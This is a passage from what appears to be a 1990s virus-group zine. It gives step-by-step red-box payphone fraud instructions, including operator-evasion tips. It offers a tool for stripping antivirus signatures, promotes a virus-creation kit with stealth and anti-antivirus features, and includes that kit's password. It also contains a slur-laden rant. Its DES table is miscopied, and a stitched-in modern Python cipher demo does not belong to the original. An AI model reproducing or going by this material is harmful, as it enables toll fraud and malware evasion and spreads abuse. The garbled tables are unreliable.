The better, faster alternative, is to go through AT&T using an Equal Access override code. Simply dial 10288+1-NPA-NXX-XXXX (basically, you're using AT&T to place a call which would normally be placed via your local phone company). Treat this just like an inter-LATA call (see below). Note that this will only work with AT&T (10288), as only AT&T is equipped to place long-distance calls from a pay phone. (As a side note, AT&T charges you about $2.10 or so for a call which would normally cost only $0.25. Kinda' funny... Of course, with a red box, this doesn't matter.) Unfortunately, some pay phones block Equal Access codes; if this is the case, just go through the local operator (after all, the local telco has exclusive rights to intra-LATA calls).

If you can box local calls, just deposit the virtual quarters after you dial the number, just like an inter-LATA call (see below).

Inter-LATA (long-distance)
~~~~~~~~~~~~~~~~~~~~~~~~~~
Dial up the number, then wait for the ACTS voice or AT&T operator. "Please deposit two dollars and fifty-five cents for the first three minutes."
Do as it says...hit the "one-dollar" key twice and then the "quarter" key three times (or whatever combination is required for your call). (When you get really fast, you'll find it faster to just use the "quarter" key exclusively.) "Thank you for using AT&T. You have twenty cents credit toward overtime..." That's all there is to it.

If you do get an operator, keep cool, just keep putting in money but use the "quarter" key only, as some operators will get suspicious when you drop in $1.00 in quarters at perfectly regular intervals. They almost always leave you alone.

Every so-many minutes (usually three or five) a computer voice or a live operator will ask for more money. Give it to her as outlined above.

Sometimes after you hang up an operator will call the phone back immediately, demanding some money for overtime. You can either give it to her (with your box, of course), or "give it to her." It's fun to chew out the Bell bitch when she can't do a thing about it...they just have to write off the loss. (They threaten to bill the called party sometimes, but they can't legally do this; it's just an intimidation tactic.)

International
~~~~~~~~~~~~~
Dial 011, then the country code, then the area code, and finally the local number; press the pound key ("#") to signal the end of the number. Wait for the AT&T operator to come on (notice that all long-distance and international calls that are paid for with coins [as opposed to calling cards] are only handled by AT&T...really fair). Ask her to put your call through (she may verify the number), and yes, you are paying with coins. She'll say something like "Ok, your call will cost $6.50 [this is for Melbourne, Australia], but I can only take $3.00 at a time. Please insert the first three dollars now..." Be sure to use only the "quarter" key with live operators, as many international operators have recently been alerted to red boxing. They are catching on, so be careful not to arouse their suspicion.
When you "pay" three dollars (heheh) she'll say something like, "Ok, please wait," then you'll hear the connection going through and the "foreign" ringing. When someone answers she'll say something like "This is United States calling, please hold for an international call." If no one's home, you'll get your money back. Too bad none comes out... The person is then muted out, then she asks for the rest of the money. Give it to her. "Thank you, go ahead..."

Every so-many minutes (usually one or two) a live operator will ask for more money. Give it to her as outlined above. (Note: regardless of what they may say, the operator tends to hang out on the line and listen in on you. Do not tell the person how you're calling, as I'm sure that's how they once caught on. I'd also suggest keeping the conversation legal.)

Sometimes after you hang up an operator will call the phone back immediately, demanding some money, just as with a long-distance call. See above for more details.

Where Should I Call From?
~~~~~~~~~~~~~~~~~~~~~~~~~
To be brief, you can use your red box from any true pay phone (red boxes do not work on COCOTs [privately-owned pay phones]). Notice I say "can" and not "should;" some phones are definitely better than others.

I've found that the best places to make calls from are government-owned buildings. Why? These are public places, there are always real pay phones there, and they are indoors, where it's warm in the winter and cool in the summer. The best phones are isolated and have a place for you to sit while you talk. I suggest you box from libraries, schools, municipal buildings, etc., but in my opinion, high schools are best. Why? They're open late for sports, etc. most days, even weekends, and you can blend in very easily (if you're a teenager, you're a student; if you're older, you're an older brother visiting your old school; if you look old enough, you're a parent). Just go after school hours or it'll be noisy...
Everyone has a favorite place, just look around and find yours.

Will I Be Caught?
~~~~~~~~~~~~~~~~~
The following is an approximation of chances of being caught while using a red box (and dealing with a live operator). You can assume that you will never be caught when dealing with an electronic "operator" (ACTS). Again, these are only approximations based on my experience. Remember, though, even if you are caught, nothing will happen to you; just hang up and try again. If they threaten to call the police or anything, just take off, don't take any chances.

Range            % Detected
~~~~~            ~~~~~~~~~~
Local            5% or less
Long-distance    25% or less
International    75% or less

Closing
~~~~~~~
I've found red boxing to be a great form of phreaking. There's no risk of being caught and you can call anywhere in the world for free -- all it takes is a $30 investment and the willingness to put up with the hassles. Plus, you get the added bonus of being able to laugh to yourself next time you see some chump actually putting real money in a pay phone (gasp!).

Time to give credit where credit is due: I'd like to thank The Baron and Guido Sanchez for introducing me to red boxing, and GarbageHeap for telling me some of the tricks of the trade (come back to Chicago soon!). Also, some of the information in the Autumn 1992 issue of 2600 magazine and in various text files (e.g. RED.BOX, etc.) has proved useful to me, and was referenced in this article. To everyone, your help is much appreciated.

Well folks, get going, and have fun with your new toy!

Nowhere Man/NuKE
===========================================================================
===========================================================================
SCAN v100 Virus Signatures
~~~~~~~~~~~~~~~~~~~~~~~~~~
The following is a list of all scan strings extracted from McAfee's Scan v100. Note: No self-mutating virus signatures can be automatically extracted from SCAN due to problems with wildcard searches.
If you need the signature for a mutating virus not found on the list, please contact: Screaming Radish@111:950/75 via 111:950/3.

[Note from Rock Steady: We have also included a file called MCAFEE.STR, the product of Screaming Radish from Australia, that removes Scan strings from any version of the AV program SCAN by McAfee. We have a similar method for F-Prot, and F-Prot's VIRSTOP, which will be included in the next InfoJournal. Check it out -- are you surprised how dumb this program is? Remember the first MtE scare? SCAN used *VIRUS STRINGS* on it! HAHAHA...dummies! And they claimed a 99.9999% hit rate...bite me.]
Screaming Radish/NuKE
===========================================================================
===========================================================================

A "Virus Group" or "Viral Warez?"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

As a long-time figure in the virus world, I cannot help but be disgusted
by some of the upstart new "virus groups" that have been appearing in the
last six months. These so-called virus writers are little more than warez
people who like to pass around viruses instead of pirated software.

For example, there's one Toronto-based group, who shall remain nameless,
which has its own couriers and ANSI makers. This is sickening. This
sweet-potato "virus group" consists of a bunch of geeks who get off on
mass-producing lame viruses, then typing up stupid .NFO files reminiscent
of INC and sending the package out around their local area. Too cheap to
call long-distance, too lame to phreak, these scum are largely confined to
Ontario, though they claim to have sites all over the world, which are, of
course, PRIVATE, making them conveniently hard to reach. A good thing,
too, since these sites don't exist.

Then these faggots create their "own" virus-generator using code ripped
straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners),
then don't give credit where credit is due... This lame virus generator
comes with a nice snazzy .NFO file with huge, dripping ASCII drawings of
their group's name, nice boxes, credits, etc., straight out of an INC/TDT
info file.

Not only that, but this group can't even decide its own name, which
changes from virus to virus, from newsletter to newsletter. (Youth,
youngsters, which is it? Why not just change it to "14-year-olds?") The
membership is also constantly changing.
Most members don't do shit, while a few write tons of lame trojans and
viruses so that they have something to brag about.

VGA artists? ANSI artists? What the fuck is this? Since when did a virus
require a graphic? It seems as though the group can't decide whether it'll
put out art or viruses... And what sort of virus group has couriers? Are
their viruses so awful that they won't spread by themselves? Why do some
members have personal LD couriers to call across town? (Too cheap to pay
for local calls? When the split to 905 occurs they'll probably have to
retire!) Why do they have couriers, period? Next thing you know they'll
have full-time doc writers. Wait, they already do! I guess the people who
run this group are too dead to think of their own shit so they have to
hire others.

If we're all lucky, these people MAY go away soon, VIPER themselves into
retirement. Of course there are always plenty of groups to rise up and
take their place. There are groups that form and then break apart because
no one knows how to program. There are those one-man groups of people who
are too repulsive to get anyone to help them... I guess these groups serve
one important function -- they make the real virus programmers look that
much better. Thanks guys.

                                                        Nowhere Man/NuKE
===========================================================================
===========================================================================

VCL v2.0 Update
~~~~~~~~~~~~~~~

"What's happening with VCL v2.0?" is all we ever hear today. Well, making
a product like VCL is not as easy as you may think! Let's compare. VCL
offers the user unique user-configured viruses; if you want it to display
a message, no problem; if you wish to add a routine, no problem. It's very
flexible, unlike other virus generators. The others simply consist of one
generic virus, and simply block out unneeded parts to generate your virus.
The options it gives you are junk, like "Infect .COM" or "Infect .EXE."
Please, we don't need that, you could just hack out a pre-existing virus
if you want that. VCL is much more complex. Nevertheless, we did it once
with VCL v1.0, and we will continue to set the standard with v2.0.

The VCL kit is STILL undergoing construction. It will feature a similar
user-friendly environment, but the viruses produced will be much better
than before. The key word is STEALTH, v2.0 seeing the addition of TSR
viruses with numerous stealth options, some never seen or tried before on
a virus. Some of the new features of VCL v2.0 include:

     o  .COM, .EXE, .OVL, .SYS, and .BIN infection
     o  Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and
        2.88M diskettes
     o  MBR/partition infections for hard disks
     o  Directory-entry infections (similar to Creeping Death)
     o  Incredible stealth capabilities
     o  Cryptex(C) encryption generation, with support for MtE and TPE
     o  The NuKE Encryption Device, a mutation engine by Nowhere Man
        written for use with v2.0
     o  Anti-anti-virus options
     o  Improved anti-trace options
     o  Increased user control over virus creation (more options!)
     o  New effects and conditions
     o  Enhanced environment

v2.0 will also differ from the initial release in that it is a team
effort. While v1.0 was entirely written by Nowhere Man, v2.0 is a complete
NuKE collaboration; besides Nowhere Man, Rock Steady, Screaming Radish,
TäLöN, and others will be working on the project. This allows us to expand
VCL in ways that one man alone could not hope to do, a perfect example of
the increasing cohesiveness of our group.

So, when will v2.0 be completed? We can't say for certain. Already several
deadlines have been broken, and we'd rather not promise any dates. All we
can say with certainty is that it will be released before the end of the
year. Keep a look out for it, and keep those suggestions coming!

VCL v1.0 FAQ
~~~~~~~~~~~~

Nowhere Man has provided us with a list of frequently asked questions (and
their answers) concerning VCL v1.0, which we present here.
He requests that no more bug reports be made, as v2.0 is being rewritten
from the ground up and so should therefore be free of bugs in v1.0.
Comments and suggestions are still welcome, however.

Q:  HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM?

A:  VCL v1.0 was password-protected for this very reason: to keep lame
    fucks like this from using it. I gave out the password on every NuKE
    site, and relied upon word-of-mouth to spread it from there. All
    "good" boards would probably get it. However, seeing as v1.0 is now
    becoming outdated, I've decided to be generous and tell the password
    to the world: it's "Chiba City" (typed exactly as shown, capital Cs,
    lower-case otherwise). Please do not mail me (or anyone else) for the
    password, 'cause I'll just delete the message. (For those who are
    interested, "Chiba City" was a random phrase taken from William
    Gibson's _Neuromancer_. There was some conjecture on the nets a while
    ago as to what it meant. It's a city in Japan where much of the book's
    action takes place.)

Q:  Why do you include an IDE (Integrated Development Environment)? I
    mean, using an IDE is akin to a walking person intentionally crippling
    his own legs or a sighted person poking her own eyes out, right?

A:  Fuck off, Dark Angel. :-)

Q:  How come VCL doesn't install properly? I type in the password (Chiba
    City), but it says I need to reinstall from an original copy, or it
    hangs when creating VCL.CFG. I'm running with (whatever)...

A:  Ok, there can be several causes for this. First, VCL v1.0 will not
    work with Stacker, SuperStor, or any other on-the-fly disk compressor.
    Sorry, but I was unaware of this problem for quite a while, since no
    one I know uses Stacker. Run it from an unStacked disk. The other
    problem could be caused by a bad version of INSTALL.EXE, the
    installation program. I have released a new version of it under the
    name NEWINSTL.ZIP (some copies of VCL will have the new install
    included).
    If you don't already have it and you can't install properly, try using
    the new version. If all else fails, only install to C:\VCL, that
    should always work. Otherwise, your problem is a corrupted .ZIP or a
    hacked/pre-installed copy of VCL. Use only the original version.

Q:  Where's your source code, dude? I want to hack it so I can make my
    "own" virus generator, but I can't seem to find it. Is it inside the
    .EXE or something? Please help me soon, a new version of IVP is due
    out next week! Also, why don't you include some ANSIs with VCL and put
    in a .NFO file with elaborate ASCII setups, NoWhere Man?

A:  (Nowhere Man draws a gun, raises it to the head of the blithering,
    fourteen-year-old Torontonian fashion-tragedy standing before him, and
    pulls the trigger. KABLYAM!) Seriously, the source code to VCL will
    not be released to the general public, it's for NuKE internal use
    only. Sorry. Nowhere Man will be happy to answer any general questions
    as to the workings of the VCL IDE/compiler, if you're wondering how it
    works.

Q:  VCL won't compile my virus. How come?

A:  There are several causes for this, too. First, you may not have your
    assembler configured correctly (check it out from DOS, and be sure
    that the Assembler string is set correctly), or you may not have an
    assembler at all. If your assembler normally works, it could be that
    you don't have enough memory for the compiler (VCL shells out to run
    it, and it itself uses 200k, so if you have low memory when starting
    VCL, your assembler will have even less). Try removing TSRs,
    decreasing buffers, etc. if this seems to be the case. Your assembler
    might not be truly MASM/TASM compatible, too. Specifically, A86 will
    not work with VCL without user-modification of VCL-generated code.
    There is also the chance that a routine that you've added has bad
    assembler code, causing your assembler to abort, spoiling the process.
    There's also the very remote chance that VCL has produced bad code
    (when there is low memory a stray pointer sometimes causes VCL to go
    haywire and churn out bad ASM code). If none of this seems to be the
    case, just Make .ASM and assemble it yourself from DOS.

Q:  HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL
    MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO INDIANA
    TO GET ME FIREWORKS!

A:  Go to hell, Suicidal Maniac!

Q:  I've written a virus and it seems to crash occasionally or give odd
    error messages. What's up?

A:  Do you have Anti-Tracing functions on? If so, turn them off. I made a
    small mistake in the anti-trace code which can cause system crashes
    under some conditions. It worked fine for me, but on some setups
    strange things can happen. If you don't have anti-tracing on, I'm
    afraid I can't help you...just look over the code (if you know
    assembler) and look for possible errors.

Q:  Ok, I've written a trojan horse, but when I run it, it crashes. I've
    compiled from DOS with...

A:  Ah ha, that's enough! As I stated in the on-line help, when using
    encryption on a trojan horse, you *must* compile from the VCL IDE. If
    for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You
    see, unlike viruses, which can start off unencrypted, trojans must be
    encrypted from the start, since they only go off once and are sent
    direct, not in infected files. For that reason, the general technique
    of having the initial encryption key be zero (used by almost all
    encrypted viruses) won't work; VCL generates the encryption routine
    assuming the trojan's already encrypted. When you compile from the
    IDE, VCL pre-encrypts the trojan, so the encryption/decryption routine
    decrypts it at runtime. But when you compile from DOS, the trojan is
    unencrypted, so when it's run, the routine *encrypts* the virus,
    causing it to crash (the processor's trying to run useless code).

Q:  HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO I
    DO FOR IT NE WAY?
    THANX L8R!!!

A:  Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF!

Q:  When I link my virus, it says "Warning: no stack." What's wrong?

A:  Absolutely nothing. The linker can give this message if it's
    generating a .COM file (which all VCL executables are). It thinks
    there should be a stack, but .COMs don't have built-in stacks, only
    .EXEs do. Be sure to run EXE2BIN, however, as the linker outputs an
    .EXE file.

                                    Nowhere Man and The NuKE Associates
===========================================================================
===========================================================================

Data Encryption Standard (DES)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The DES algorithm is a mathematical device, not an IC chip, computer
system or other piece of hardware. Several H/Pers have heard the buzzword
"DES Encryption" many times and, yet, few individuals seem to know what it
really means. Therefore, on my search to find out more about the IBM 9600
modems included with the IBM 4700s, I fell upon the need-to-know on how
DES really worked, in order to learn about its fallbacks. Hopefully this
will answer many questions you have, as well as generate a few.

The Computer Age brought with it computer usage in banking and the
financial institutions. Inevitably, computer crime came along with it.
There arose the problem that, with sufficient knowledge and a computer
terminal, one could transfer funds into his own account, make credit
purchases on someone else's card, or even get money from a cash-dispensing
machine. IBM quickly realized this and in the early 1970s set up a
research group to develop a suitable cipher code to protect data. In 1971,
a code named LUCIFER was developed. It was sold to Lloyds of London for
use with an IBM-developed cash-dispensing system.

LUCIFER
~~~~~~~

Lucifer was successful but it had some weaknesses. IBM then spent about
three years refining and strengthening Lucifer.
The code was analyzed over and over by experts in cryptology. It withstood
sophisticated cryptoanalytical attacks and, by 1974, it was ready to
market.

Around the same time, the National Bureau of Standards (NBS), which since
1965 was responsible for developing standards for the purchase of computer
equipment by the Federal Government (USA), initiated a study of computer
security. The NBS saw a need for an encryption method, and solicited for a
suitable encryption algorithm. This was done in May 1973, and August 1974.
The algorithm was to be for the storage and transmission of unclassified
data.

In response to this solicitation IBM submitted its Lucifer cipher. This
cipher consisted of an extremely complex algorithm embedded in an IC
structure. Basically the cipher key goes into a series of eight "S"
boxes -- complex mathematical formulas that encrypt and decrypt data with
the appropriate key. The initial Lucifer cipher had a 128-bit key. Before
it submitted the cipher to NBS, IBM shortened it by removing more than
half the key.

NSA Participation
~~~~~~~~~~~~~~~~~

The National Security Agency (NSA), however, had taken an enormous
interest in Project Lucifer. It had lent IBM a hand in the development
process and had helped to develop the S-box structures, as NSA needed to
know the structure of Lucifer just in case they needed to decrypt data
encoded with it.

For years NSA had been dependent on international data communications. It
monitored data communications, such as Middle East oil transactions and
messages, and the financial and trade transactions from Latin America,
Europe, and the Far East. Also, military and diplomatic intelligence
(encrypted using crude techniques) were picked up and deciphered by NSA.
Thus, much information about Communist countries was obtained from
non-communist countries. Now, the development of an economical, highly
secure, data-encryption device threatened to cause NSA serious trouble.
Also, outside researchers might stumble across some of NSA's methods.

Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key
from 128 bits to 56 bits, and to classify certain details about their
selection of the eight "S" boxes for the cipher.

The National Bureau of Standards passed this cipher to NSA for analysis.
The NSA certified the algorithm as "free" of any mathematical or
statistical weaknesses and recommended it as the best candidate for the
National Data Encryption Standard (DES). This suggestion was met with
criticism. Was the cipher just long enough to prevent corporate
eavesdroppers from penetrating it, and just short enough for NSA's code
breakers?! Was there a mathematical trick (CLASSIFIED) that would enable
NSA to quickly break the code?

The NSA had been tinkering with the critical "S" boxes, and it had
therefore INSISTED that certain details were to be classified. The reason
cited for this was simple: since the DES would be commercially available
and would be sold abroad as well, NSA would be hanging itself by
permitting the foreign use of an unbreakable cipher. The weaknesses
designed into the cipher would still allow the agency to penetrate every
communications channel and data bank using DES. The code breakers at NSA
wanted to be sure the NSA could break the cipher.

As a result, a bureaucratic agreement was reached. The S-Box part of the
cipher was strengthened (which is CLASSIFIED), and the key, which was
dependent on the users of the code, was weakened. (Did NSA put a
"Backdoor" into DES? The answer is normally YES! NSA had to have the
upper-hand to all code encrypted with DES. If we go back a few months a
movie was based on this topic. "Sneakers" raised several hints that DES
had a backdoor.)

Computer "rumours" (well more like FACTS) say that it would be possible to
build a computer using a million special "search chips" that could test a
million possible solutions per second, and, therefore in 72,000 seconds
(20 hours), all possible combinations could be tried. There would be a 50%
probability that just 10 hours of trial-time would break the code
(56-bits).

What if the 128-bit key, the original Lucifer, had been submitted for
consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned"
with the NSA for a 56-bit key? Nevertheless a 128-bit key provides
34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number is
astronomical and incomprehensible to most people. If one TRILLION
solutions per second were possible it would take a mere 34 x 10 ^ 25
seconds or about 10,800,000,000,000,000,000 YEARS! And we are only
rumoured to know about the one-million possible solutions per second, not
a trillion as used in this example! Therefore IBM's Lucifer code (at
present) is probably unbreakable.

DES Becomes Accepted
~~~~~~~~~~~~~~~~~~~~

And on June 15, 1977, the Data Encryption Standard (DES) became the
official civilian cipher of the U.S. government. It is now widely used in
banking systems and other classified institutions.

To follow are a few clips from FIPS on DES, perhaps we can learn a tad
from this code and implement a rather crude manner of it into a virus?
Undoubtedly we will have all of Solomon's, McAfee's, Frisk's and other's
horses and men trying to "crack" the code, but will they succeed in doing
so? There's only one way to find out now? Right?

Excerpts from the Data Encryption Standard
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

(From Federal Information Processing Standards (FIPS) publications 46, 74,
and 81.)

The Data Encryption Standard (DES) specifies an algorithm to be
implemented in electronic hardware devices and used for the cryptographic
protection of computer data.
The publications concerning this standard provide a complete description
of a mathematical algorithm for encrypting (enciphering) and decrypting
(deciphering) binary-coded information. Encrypting data converts the data
to an unintelligible form called cipher. Decrypting a cipher converts the
data back to its original form. The algorithm described in the standard
specifies both enciphering and deciphering operations which are based on a
binary number called a key. The key consists of 64 binary digits, of which
56 bits are used directly by the algorithm and 8 bits are used for error
detection (checksum).

Binary-coded data may be cryptographically protected using the DES
algorithm in conjunction with a key. The key is generated in such a way
that each of the 56 bits used directly by the algorithm is random and the
8 error-detecting bits are set to make the parity of each 8-bit byte of
the key odd, ie: there is an odd number of 1s in each 8-bit byte. Each
member of a group of authorized users of encrypted computer data must have
the key that was used to encipher the data in order to use the data. This
key, held by each member in common, is used to decipher any data received
in cipher form from other members of the group.

The encryption algorithm specified in this standard is commonly known
among those using the standard. The unique key chosen for use in a
particular application makes the results of encrypting data, using the
algorithm, unique. Selection of a different key causes the cipher, which
is produced for any given set of inputs, to be different. The
cryptographic security of the data depends on the security provided for
the key that is used to encipher and decipher the data.

Data can be recovered from a cipher only by using exactly the same key
that was used to encipher it. Unauthorized recipients of the cipher, who
know the algorithm but do not have the correct key, cannot derive the
original data algorithmically.
However, anyone who does have the key and the algorithm can easily
decipher the cipher and obtain the original data. A standard algorithm,
which is based on a secure key, thus provides a basis for exchanging
encrypted computer data, by issuing the key that is used to encipher it
only to those authorized to have the data. Additional Federal Information
Processing Standards (FIPS) guidelines for implementing and using the DES
are being developed and will be published by NBS.

"Guidelines for Implementing and Using the NBS Data Encryption Standard,"
FIPS Publication 74.

NBS describes two different modes for using the algorithm described in
this standard. Blocks of data containing 64 bits may be directly entered
into the device where 64-bit cipher blocks are generated under control of
the key. This is called the "Electronic CodeBook" (ECB) mode.
Alternatively, the device may be used as a binary stream generator to
produce statistically random binary bits, which are then combined with the
clear (unencrypted) data (1 to 64 bits) using an "Exclusive OR" (XOR)
logic operation. In order to assure that the enciphering device and the
deciphering device are synchronized their inputs are always set to the
previous 64 bits of cipher that were transmitted or received. This second
mode of using the encryption algorithm is called the "Cipher FeedBack"
(CFB) mode.

The Electronic CodeBook mode generates blocks of 64 cipher bits. The
Cipher FeedBack mode generates a cipher having the same number of bits as
the plain text. Each block of cipher is independent of all others when the
Electronic CodeBook mode is used, while each byte (group of bits) of
cipher depends on the previous 64 cipher bits when the Cipher FeedBack
mode is used.

The cryptographic algorithm specified in this standard transforms a 64-bit
binary value into a unique 64-bit binary value based on a 56-bit variable.
If the complete 64-bit input is used (ie: none of the input bits should be
predetermined from block to block) and if the 56-bit variable is randomly
chosen, no technique other than that of trying all the possible keys,
using a known input and output for the DES, will guarantee finding the
chosen key. As there are over 70,000,000,000,000,000 (70 quadrillion)
possible keys of 56 bits, the feasibility of deriving a particular key in
this way is extremely unlikely in typical "threat" environments. Moreover,
if the key is changed frequently, the risk of this event happening is
greatly diminished. However, users should be aware that it is
theoretically possible to derive the key in fewer trials (with a
correspondingly lower probability of success depending on the number of
keys tried), and should be cautioned to change the key as often as
practical. Users must change the key and must provide it a high level of
protection in order to minimize the potential risks of its unauthorized
computation or acquisition. The feasibility of computing the correct key
may change with advances in technology.

Data Encryption Methods
~~~~~~~~~~~~~~~~~~~~~~~

Encryption is the transformation of data from its original intelligible
form to an unintelligible cipher form. Two basic transformations may be
used: permutation and substitution. Permutation changes the order of the
individual symbols comprising the data. In a substitution transformation,
the symbols themselves are replaced by other symbols. During permutation,
the symbols retain their identities but lose their positions. During
substitution, the symbols retain their positions but lose their original
identities.

The set of rules for a particular transformation is expressed in an
algorithm. Basic transformations may be combined to form a complex
transformation. In a computer system, the symbols of the data are groups
of one or more binary digits (1s and 0s) called bits. A group of bits is
called a byte.
In computer applications, the encryption transformation of permutation
reorders the bits of the data. The encryption transformation of
substitution replaces one bit with another or one byte with another.

Data Encryption Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~

The algorithm is designed to encipher and decipher blocks of data
consisting of 64 bits under control of a 64-bit key. Deciphering must be
accomplished by using the same key that was used for enciphering, but with
the schedule of addressing the key bits altered so that the deciphering
process is the reverse of the enciphering process. A block to be
enciphered is subjected to an initial permutation, IP, and then to a
complex key-dependent computation, and, finally, to a permutation which is
the inverse of the initial permutation. The key-dependent computation can
be defined simply, in terms of a function "F" called the cipher function,
and the function "KS" called the key schedule.

A description of the computation is given first along with the details as
to how the algorithm is used for encipherment. Next the use of the
algorithm for decipherment is described. Finally, a definition of the
cipher function "F" is given in terms of the primitive functions, which
are called the selection functions "Si" and the permutation function "P".
The primitive functions Si, P, KS of the algorithm are contained in the
Appendix of FIPS Publication 46.

The following notation is convenient: Given two blocks (L and R) of bits,
LR denotes the block consisting of the bits of L followed by the bits of
R. Since concatenation is associative, B1,B2...B8, for example, denotes
the block consisting of the bits of B1 followed by the bits of
B2...followed by the bits of B8.

Enciphering
~~~~~~~~~~~

A sketch of the enciphering computation is given below. The following
information is given more clearly and accurately in FIPS Publications 46
and 74. It is quoted here for informational purposes only.

The 64 bits of the input block to be enciphered are first subjected to the
following permutation, called the initial permutation, IP:

     --------- IP -----------
     58 50 42 34 26 18 10  2
     60 52 44 36 28 20 12  4
     62 54 46 38 30 22 14  6
     64 56 48 40 32 24 16  8
     57 49 41 33 25 17  9  1
     59 51 43 35 27 19 11  3
     61 53 45 37 29 21 13  5
     63 55 47 39 31 23 15  7
     ------------------------

That is, the permuted input has bit 58 of the input as its first bit, bit
50 as its second bit, and so on, with bit 7 as its last bit. The permuted
input block is then the input to the complex key-dependent computation
described below. The output of that computation, called the preoutput, is
then subjected to the following permutation, IP-1, which is the inverse of
the initial permutation:

     -------- IP -1 ---------
     40  8 48 16 56 24 64 32
     39  7 47 14 54 22 62 31
     38  6 46 14 54 22 62 30
     37  5 45 13 53 21 61 29
     36  4 44 12 52 20 60 28
     35  3 43 11 51 19 59 27
     34  2 42 10 50 18 58 26
     33  1 41  9 49 17 57 25
     ------------------------

That is, the output of the algorithm has bit 40 of the preoutput block as
its first bit, bit 8 as its second bit and so on, until bit 25 of the
preoutput block is the last bit of the output.

Characteristics of the DES Algorithm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The DES algorithm is a recirculating, 64-bit, block product cipher whose
security is based on a secret key. DES keys are 64-bit binary vectors
consisting of 56 independent information bits and 8 parity bits. The
parity bits are reserved for error-detection purposes and are not used by
the encryption algorithm. The 56 information bits are used by the
enciphering and deciphering operations and are referred to as the active
key. Active keys are generated (selected at random from all possible keys)
by each group of authorized users of a particular computer system or set
of data. Each user should understand that the key must be protected and
that any compromise of the key will compromise all data and resources
protected by that key.

In the encryption computation, the 64-bit data input is divided into two
halves, with each consisting of 32 bits. One half is used as input to a
complex nonlinear function, and the result is Exclusive-OR'ed to the other
half. After one iteration, or round, the two halves of the data are
swapped and the operation is performed again. The DES algorithm uses 16
rounds to produce a recirculating block product cipher. The cipher
produced by the algorithm displays no correlation to the input. Every bit
of the output depends on every bit of the input and on every bit of the
active key.

The security provided by the DES algorithm is based on the fact that, if
the key is unknown, an unauthorized recipient of encrypted data, knowing
some of the matching input data, must perform an unacceptable effort to
decipher other encrypted data or recover the key. Even having all but one
bit of the key correct does not result in intelligible data. The only
known way of obtaining the key with certainty is by obtaining matching
ciphertext and plaintext and, then, exhaustively testing the keys by
enciphering the known plaintext with each key and comparing the result
with the known ciphertext. Since 56 independent bits are used in a DES
key, 2^56 such tests are required to guarantee finding a particular key.
The expected number of tests needed to recover the correct key is 2^55. At
one microsecond per test, 1142 years would be required. Under certain
conditions (not only knowing matched plaintext and ciphertext but also the
complement of the plaintext and the resulting ciphertext), the expected
effort could be reduced to 571 years. The possibility of 70 quadrillion
keys makes the guessing or computing of any particular key very unlikely,
given that the guidelines for generating and protecting a key provided in
the publication are followed.
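
The round structure described above and the two modes from the FIPS 74 excerpt (ECB and CFB) can be seen working together in a small model. This is an added example, not code from the journal or from FIPS: the round function and key schedule are SHA-256 stand-ins rather than the DES S-boxes and KS, the starting register value `IV` is an assumption the excerpt does not mention, and all names and sample values are constructed. It shows decipherment as the same computation with the key schedule reversed, ECB leaking repeated blocks, and 8-bit CFB resynchronizing after a damaged cipher byte.

```python
import hashlib

BLOCK = 8     # 64-bit blocks, as in the FIPS text
ROUNDS = 16   # DES uses 16 rounds


def key_schedule(key):
    """Stand-in for KS (assumption): one 4-byte subkey per round."""
    return [hashlib.sha256(key + bytes([r])).digest()[:4] for r in range(ROUNDS)]


def f(half, subkey):
    """Stand-in for the cipher function F; real DES uses the S-boxes and P."""
    return hashlib.sha256(subkey + half).digest()[:4]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def feistel(block, subkeys):
    """One half feeds F, the result is XORed into the other half, then swap."""
    left, right = block[:4], block[4:]
    for subkey in subkeys:
        left, right = right, xor(left, f(right, subkey))
    return right + left   # undo the final swap


def encrypt_block(block, key):
    return feistel(block, key_schedule(key))


def decrypt_block(block, key):
    # Same computation with the key schedule addressed in reverse order.
    return feistel(block, key_schedule(key)[::-1])


def ecb_encrypt(data, key):
    """Electronic CodeBook: every 64-bit block is enciphered on its own."""
    if len(data) % BLOCK:
        raise ValueError("ECB needs whole 64-bit blocks")
    return b"".join(encrypt_block(data[i:i + BLOCK], key)
                    for i in range(0, len(data), BLOCK))


def _cfb(data, key, iv, decrypting):
    """8-bit Cipher FeedBack: the cipher input is the previous 64 cipher bits."""
    if len(iv) != BLOCK:
        raise ValueError("starting register must be 64 bits")
    register, out = iv, bytearray()
    for byte in data:
        stream_byte = encrypt_block(register, key)[0]
        result = byte ^ stream_byte
        cipher_byte = byte if decrypting else result
        register = register[1:] + bytes([cipher_byte])   # shift cipher in
        out.append(result)
    return bytes(out)


def cfb_encrypt(data, key, iv):
    return _cfb(data, key, iv, decrypting=False)


def cfb_decrypt(data, key, iv):
    return _cfb(data, key, iv, decrypting=True)


def damaged_positions(plain, key, iv, flip_at):
    """Flip one cipher bit in transit; list plaintext indexes decoded wrongly."""
    cipher = bytearray(cfb_encrypt(plain, key, iv))
    cipher[flip_at] ^= 0x01
    recovered = cfb_decrypt(bytes(cipher), key, iv)
    return [i for i, (a, b) in enumerate(zip(plain, recovered)) if a != b]


# Constructed sample values.
KEY = b"constructed-key"
IV = bytes(BLOCK)
REPEATED = b"PAY 100$" * 3     # the same 64-bit block three times

if __name__ == "__main__":
    ecb = ecb_encrypt(REPEATED, KEY)
    cfb = cfb_encrypt(REPEATED, KEY, IV)
    print("ECB repeats cipher blocks:", ecb[:8] == ecb[8:16])
    print("CFB repeats cipher blocks:", cfb[:8] == cfb[8:16])
    print("CFB damage after flipping byte 2:",
          damaged_positions(REPEATED + b"!", KEY, IV, 2))
```

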